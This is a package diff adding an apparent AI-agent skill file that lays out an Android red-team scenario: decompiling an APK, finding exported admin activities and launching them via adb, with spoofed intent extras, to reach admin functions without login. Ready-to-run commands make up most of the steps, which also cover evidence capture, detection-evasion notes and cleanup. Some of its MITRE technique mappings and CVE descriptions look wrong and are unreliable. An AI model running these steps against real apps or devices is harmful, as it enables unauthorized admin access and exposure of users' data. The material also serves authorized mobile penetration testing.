rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md

@@ -0,0 +1,463 @@
+---
+name: rt-scenario-m003
+description: "M-003: Exported Activity → Admin Function Access Without Login. Domain: mobile. Attack chain: decompile APK → check AndroidManifest.xml → find exported=true activities → launch via adb → access admin functionality. MITRE: T1626 → T1078. Real example: App has AdminDashboardActivity exported=true → adb shell am start → direct admin panel access"
+---
+
+# M-003: Exported Activity → Admin Function Access Without Login
+
+## Overview
+
+**Attack Objective:** Bypass authentication by directly invoking exported Android activities that expose privileged functionality — such as admin dashboards, settings panels, or user management screens — without requiring valid credentials.
+
+**Required Access Level:** None (physical or USB access to device) / Low (adb enabled over network)
+
+**Estimated Time to Execute:** 20–45 minutes (depending on APK complexity and obfuscation)
+
+**Detection Risk Level:** Low — activity launches via adb do not trigger authentication flows, generate no login events, and leave minimal forensic artifacts on the device. Server-side detection depends on whether the admin endpoint validates session tokens independently.
+
+---
+
+## Prerequisites
+
+### Required Tools
+
+| Tool | Purpose | Install Command |
+|------|---------|-----------------|
+| adb (Android Debug Bridge) | Launch activities, interact with device | `sudo apt install adb` / included in Android SDK Platform Tools |
+| apktool | Decompile APK and extract AndroidManifest.xml | `sudo apt install apktool` or download from https://apktool.org |
+| jadx | Decompile APK to Java/Kotlin source for deeper analysis | `sudo apt install jadx` or https://github.com/skylot/jadx/releases |
+| aapt / aapt2 | Quick manifest inspection without full decompile | Included in Android SDK build-tools |
+| grep / ripgrep | Search manifest and source for exported attributes | `sudo apt install ripgrep` |
+
+```bash
+# Verify adb is working
+adb version
+
+# Install apktool (Debian/Ubuntu)
+sudo apt update && sudo apt install -y apktool
+
+# Install jadx via release binary
+wget https://github.com/skylot/jadx/releases/latest/download/jadx-1.5.0.zip
+unzip jadx-1.5.0.zip -d ~/tools/jadx
+export PATH=$PATH:~/tools/jadx/bin
+```
+
+### Required Access or Conditions
+
+- Physical USB access to an Android device with USB Debugging enabled, OR
+- adb over TCP/IP enabled on the target device (port 5555 open), OR
+- An Android emulator running the target application
+- The target APK file (pulled from device or obtained via other means)
+- adb authorized on the device (USB debugging approved)
+
+### Skill Level
+
+**BEGINNER** — All steps use documented, publicly available tools with straightforward command syntax. No custom exploit development required.
+
+---
+
+## Attack Chain
+
+```
+[1] Obtain APK
+      |
+      v
+[2] Decompile APK with apktool
+      |
+      v
+[3] Parse AndroidManifest.xml — find exported=true activities
+      |
+      v
+[4] Prioritize high-value targets (Admin, Dashboard, Settings, Debug)
+      |
+      v
+[5] Cross-reference with jadx source — confirm no runtime auth check
+      |
+      v
+[6] Launch target activity via adb shell am start
+      |
+      v
+[7] Access admin functionality — enumerate, screenshot, exfiltrate
+```
+
+**MITRE ATT&CK Chain:** T1626 (Abuse Elevation Control Mechanism) → T1078 (Valid Accounts — bypassed entirely)
+
+---
+
+## Step-by-Step Execution
+
+### Step 1: Pull the APK from the Device
+
+```bash
+# List installed packages and find the target
+adb shell pm list packages | grep -i <appname>
+
+# Example output:
+# package:com.example.retailapp
+
+# Get the APK path
+adb shell pm path com.example.retailapp
+
+# Example output:
+# package:/data/app/com.example.retailapp-1/base.apk
+
+# Pull the APK to local machine
+adb pull /data/app/com.example.retailapp-1/base.apk ./target.apk
+```
+
+**Expected Output:** `target.apk: 1 file pulled, X MB/s`
+
+**Fallback:** If adb pull is denied due to permissions, obtain the APK from the Google Play Store via a third-party APK mirror (e.g., APKPure), or use:
+```bash
+adb backup -apk com.example.retailapp
+```
+
+---
+
+### Step 2: Decompile APK with apktool
+
+```bash
+apktool d target.apk -o ./target_decompiled
+```
+
+**Expected Output:**
+```
+I: Using Apktool 2.x.x
+I: Loading resource table...
+I: Decoding AndroidManifest.xml with resources...
+I: Decoding file-resources...
+I: Finished
+```
+
+**Fallback:** If apktool fails due to unknown compression:
+```bash
+apktool d target.apk -o ./target_decompiled --force --no-res
+```
+
+---
+
+### Step 3: Inspect AndroidManifest.xml for Exported Activities
+
+```bash
+# View the manifest
+cat ./target_decompiled/AndroidManifest.xml
+
+# Search specifically for exported activities
+grep -n 'exported="true"' ./target_decompiled/AndroidManifest.xml
+
+# Also catch activities with intent-filters (implicitly exported on API < 31)
+grep -n -A 5 '<activity' ./target_decompiled/AndroidManifest.xml | grep -E 'exported|intent-filter|AdminDashboard|Debug|Admin|Settings|Internal|Dev'
+```
+
+**Expected Output (Vulnerable Example):**
+```xml
+<activity
+    android:name="com.example.retailapp.admin.AdminDashboardActivity"
+    android:exported="true"
+    android:label="@string/admin_dashboard">
+</activity>
+
+<activity
+    android:name="com.example.retailapp.debug.DebugMenuActivity"
+    android:exported="true">
+</activity>
+```
+
+**Note:** On Android API level < 31, any activity with an `<intent-filter>` is implicitly exported even without `android:exported="true"`. Check both.
+
+```bash
+# Find implicitly exported (has intent-filter, no explicit exported=false)
+python3 - <<'EOF'
+import xml.etree.ElementTree as ET
+
+tree = ET.parse('./target_decompiled/AndroidManifest.xml')
+root = tree.getroot()
+
+ns = {'android': 'http://schemas.android.com/apk/res/android'}
+
+for activity in root.iter('activity'):
+    name = activity.get('{http://schemas.android.com/apk/res/android}name', '')
+    exported = activity.get('{http://schemas.android.com/apk/res/android}exported', None)
+    has_intent_filter = activity.find('intent-filter') is not None
+    
+    if exported == 'true' or (has_intent_filter and exported != 'false'):
+        print(f"[EXPORTED] {name} | explicit={exported} | intent-filter={has_intent_filter}")
+EOF
+```
+
+---
+
+### Step 4: Prioritize High-Value Target Activities
+
+```bash
+# Filter for admin/privileged activity names
+grep -i -E 'admin|dashboard|manage|internal|debug|dev|root|superuser|staff|privileged|setting' \
+    ./target_decompiled/AndroidManifest.xml
+```
+
+**Target Prioritization Criteria:**
+- Name contains: Admin, Dashboard, Manage, Internal, Debug, Dev, Root, Staff
+- Not in the normal user-facing navigation flow
+- References to roles, permissions, or user tiers in the source
+
+---
+
+### Step 5: Confirm Lack of Runtime Auth Check via Source Analysis
+
+```bash
+# Decompile to Java source with jadx
+jadx -d ./target_source target.apk
+
+# Find the target activity source file
+find ./target_source -name "AdminDashboardActivity*" -o -name "AdminDashboard*"
+
+# Inspect onCreate for auth checks
+cat ./target_source/sources/com/example/retailapp/admin/AdminDashboardActivity.java
+```
+
+**Vulnerable Pattern (No Auth Check):**
+```java
+@Override
+protected void onCreate(Bundle savedInstanceState) {
+    super.onCreate(savedInstanceState);
+    setContentView(R.layout.activity_admin_dashboard);
+    // No session check, no role verification — directly loads admin UI
+    loadAdminData();
+}
+```
+
+**Secure Pattern (What Should Exist):**
+```java
+@Override
+protected void onCreate(Bundle savedInstanceState) {
+    super.onCreate(savedInstanceState);
+    if (!SessionManager.getInstance().isAdmin()) {
+        finish();
+        return;
+    }
+    setContentView(R.layout.activity_admin_dashboard);
+}
+```
+
+If a runtime check exists but the exported activity is still reachable, check whether the check can be bypassed by supplying Intent extras:
+
+```bash
+# Search for intent extra-based auth bypass patterns
+grep -r 'getIntent().getBooleanExtra\|getIntent().getStringExtra' \
+    ./target_source/sources/com/example/retailapp/admin/
+```
+
+---
+
+### Step 6: Launch the Target Activity via adb
+
+```bash
+# Basic launch — no extras required
+adb shell am start -n com.example.retailapp/.admin.AdminDashboardActivity
+
+# If the activity requires the app to already be running
+adb shell monkey -p com.example.retailapp -c android.intent.category.LAUNCHER 1
+adb shell am start -n com.example.retailapp/.admin.AdminDashboardActivity
+
+# If extras are needed (common bypass for weak checks)
+adb shell am start \
+    -n com.example.retailapp/.admin.AdminDashboardActivity \
+    --ez isAdmin true \
+    --es userRole "ADMIN" \
+    --ei userId 1
+```
+
+**Expected Output (Success):**
+```
+Starting: Intent { cmp=com.example.retailapp/.admin.AdminDashboardActivity }
+```
+
+**Expected Output (Failure — security check present):**
+```
+Starting: Intent { cmp=com.example.retailapp/.admin.AdminDashboardActivity }
+Error type 3
+Error: Activity class {com.example.retailapp/com.example.retailapp.admin.AdminDashboardActivity} does not exist.
+```
+
+Or the activity launches but immediately closes — indicates a runtime auth check is present.
+
+**Fallback — Try component with full package path:**
+```bash
+adb shell am start \
+    -n com.example.retailapp/com.example.retailapp.admin.AdminDashboardActivity
+```
+
+**Fallback — Use intent action if defined:**
+```bash
+# Find custom actions in manifest
+grep -i 'action android:name' ./target_decompiled/AndroidManifest.xml
+
+adb shell am start -a com.example.retailapp.ACTION_ADMIN_DASHBOARD
+```
+
+---
+
+### Step 7: Access and Document Admin Functionality
+
+```bash
+# Take a screenshot of the admin panel
+adb shell screencap -p /sdcard/admin_panel.png
+adb pull /sdcard/admin_panel.png ./evidence/admin_panel.png
+
+# Record screen during exploration
+adb shell screenrecord /sdcard/admin_session.mp4
+# ... interact with the device ...
+# Ctrl+C to stop recording
+adb pull /sdcard/admin_session.mp4 ./evidence/admin_session.mp4
+
+# Dump the activity's UI hierarchy for automated analysis
+adb shell uiautomator dump /sdcard/ui_dump.xml
+adb pull /sdcard/ui_dump.xml ./evidence/ui_dump.xml
+cat ./evidence/ui_dump.xml | grep -i -E 'text|content-desc' | head -50
+```
+
+**Document what is accessible:**
+- User management (list, modify, delete users)
+- Financial data or transaction history
+- Configuration and feature flags
+- Logging and audit trail access
+- Credential stores or API key management
+
+---
+
+## Real-World Reference
+
+**Scenario:** A retail mobile application (`com.example.retailapp`) has an `AdminDashboardActivity` declared in its manifest with `android:exported="true"`. This activity was originally intended for internal QA testing but was never removed from the production build. The activity loads an admin panel that allows listing all registered users, viewing order histories, and issuing refunds — all without any authentication check in `onCreate()`.
+
+**Attack Execution:**
+```bash
+adb shell am start -n com.example.retailapp/.admin.AdminDashboardActivity
+```
+
+**Result:** The attacker gains direct access to the admin panel on any physical device with USB debugging enabled, or on any device where the attacker previously installed a companion app that proxies the intent. No credentials, no brute force, no network traffic anomalies.
+
+**Impact:** Full administrative access. All user PII exposed. Ability to issue arbitrary refunds. Audit logs not triggered because no login event occurred.
+
+**Real CVE-class Examples:**
+- CVE-2023-20963: Android WorkSource privilege escalation via exported component
+- Multiple HackerOne reports against fintech and e-commerce Android apps cite exported admin activities as critical findings (auth bypass, P1 severity)
+
+---
+
+## MITRE ATT&CK Mapping
+
+| Step | Tactic | Technique | Sub-technique | Description |
+|------|--------|-----------|---------------|-------------|
+| 1 — Pull APK | Reconnaissance | T1430 | T1430.001 | Collect application artifact from device |
+| 2 — Decompile APK | Reconnaissance | T1626 | — | Analyze application for abuse vectors |
+| 3 — Parse Manifest | Discovery | T1420 | — | File and directory discovery within app package |
+| 4 — Identify Target | Discovery | T1626 | T1626.001 | Identify elevation control mechanism — exported component |
+| 5 — Verify No Auth | Discovery | T1083 | — | File and code analysis to confirm bypass viability |
+| 6 — Launch Activity | Privilege Escalation | T1626 | T1626.001 | Abuse elevation control mechanism — exported activity |
+| 7 — Access Admin | Impact / Collection | T1078 | T1078.001 | Use of default/bypassed account access — admin function |
+
+**Primary Chain:** T1626 (Abuse Elevation Control Mechanism) → T1078 (Valid Accounts — bypassed entirely via direct component access)
+
+---
+
+## Detection & OPSEC
+
+### How This Attack Is Detected
+
+| Detection Point | Signal | Monitoring Tool |
+|----------------|--------|-----------------|
+| USB Debugging enabled | `adb connect` events, device trust dialog | MDM solutions (Intune, Jamf) |
+| Activity launch via adb | `am start` in device shell logs | Android logcat, EDR on device |
+| Abnormal activity start | Activity started with no referring activity / task stack | App-level telemetry |
+| Server-side anomaly | Admin API calls with no corresponding login event | SIEM / WAF correlation |
+| No session token in API call | API gateway receives admin-scoped request without valid JWT | API Gateway logs |
+
+### Reducing Detection Risk During Authorized Engagement
+
+- Confirm written authorization before connecting adb to any device
+- Use a dedicated test device enrolled in the engagement scope — do not use production devices
+- Disable USB debugging immediately after testing to restore device posture
+- Avoid triggering server-side admin actions unless explicitly in scope (read-only enumeration preferred)
+- Note that adb commands are logged in Android logcat — assume logs exist
+- If testing over adb TCP/IP (wireless), ensure you are on an isolated test network segment
+
+### Artifacts Left Behind
+
+| Artifact | Location | Notes |
+|---------|---------|-------|
+| adb authorization key | `/data/misc/adb/adb_keys` on device | Persists after disconnect |
+| Screenshot files | `/sdcard/admin_panel.png` | Must be manually deleted |
+| Screen recording | `/sdcard/admin_session.mp4` | Must be manually deleted |
+| UI dump | `/sdcard/ui_dump.xml` | Must be manually deleted |
+| logcat entries | Android system log (volatile) | Cleared on reboot or log rotation |
+| Server-side logs | API server audit log | Not controllable by attacker |
+
+---
+
+## Cleanup
+
+Perform all cleanup steps after the authorized engagement is complete.
+
+```bash
+# Remove screenshot evidence from device
+adb shell rm /sdcard/admin_panel.png
+
+# Remove screen recording from device
+adb shell rm /sdcard/admin_session.mp4
+
+# Remove UI dump from device
+adb shell rm /sdcard/ui_dump.xml
+
+# Remove any test files pushed during engagement
+adb shell rm /sdcard/pentest_*
+
+# Revoke adb authorization (removes this host's key from device trust list)
+# On the device: Settings → Developer Options → Revoke USB debugging authorizations
+
+# Disable USB debugging (instruct device owner or perform if in scope)
+adb shell settings put global adb_enabled 0
+
+# Verify no residual files remain
+adb shell ls /sdcard/ | grep -E 'admin|pentest|dump|record'
+
+# Clear local evidence copies per engagement data handling policy
+# (Secure delete or encrypt per ROE)
+shred -u ./evidence/admin_panel.png
+shred -u ./evidence/admin_session.mp4
+shred -u ./evidence/ui_dump.xml
+```
+
+**Note:** Server-side audit logs generated during the engagement cannot be removed by the tester. Coordinate with the client to annotate or exclude engagement-period entries from their SIEM baseline.
+
+---
+
+## References
+
+### Tools
+
+| Tool | URL |
+|------|-----|
+| Android Debug Bridge (adb) | https://developer.android.com/tools/adb |
+| apktool | https://apktool.org |
+| jadx | https://github.com/skylot/jadx |
+| drozer (Android security framework) | https://github.com/WithSecureLabs/drozer |
+| MobSF (Mobile Security Framework) | https://github.com/MobSF/Mobile-Security-Framework-MobSF |
+| Android SDK Platform Tools | https://developer.android.com/tools/releases/platform-tools |
+
+### Standards and References
+
+| Resource | URL |
+|---------|-----|
+| MITRE ATT&CK T1626 | https://attack.mitre.org/techniques/T1626/ |
+| MITRE ATT&CK T1078 | https://attack.mitre.org/techniques/T1078/ |
+| OWASP Mobile Top 10 — M1: Improper Platform Usage | https://owasp.org/www-project-mobile-top-10/ |
+| Android Manifest — exported attribute | https://developer.android.com/guide/topics/manifest/activity-element#exported |
+| Android Security Best Practices | https://developer.android.com/topic/security/best-practices |
+| OWASP Mobile Security Testing Guide (MSTG) | https://mas.owasp.org/MASTG/ |
+| OWASP MASTG Test — MSTG-PLATFORM-1 | https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/ |
+
+### Additional Reading
+
+- "Android Security: Attacking and Defending — Exported Components" — NCC Group research
+- "Intent Redirection Vulnerabilities in Android" — USENIX Security
+- Android Developers — Security with intents: https://developer.android.com/training/articles/security-tips#Intents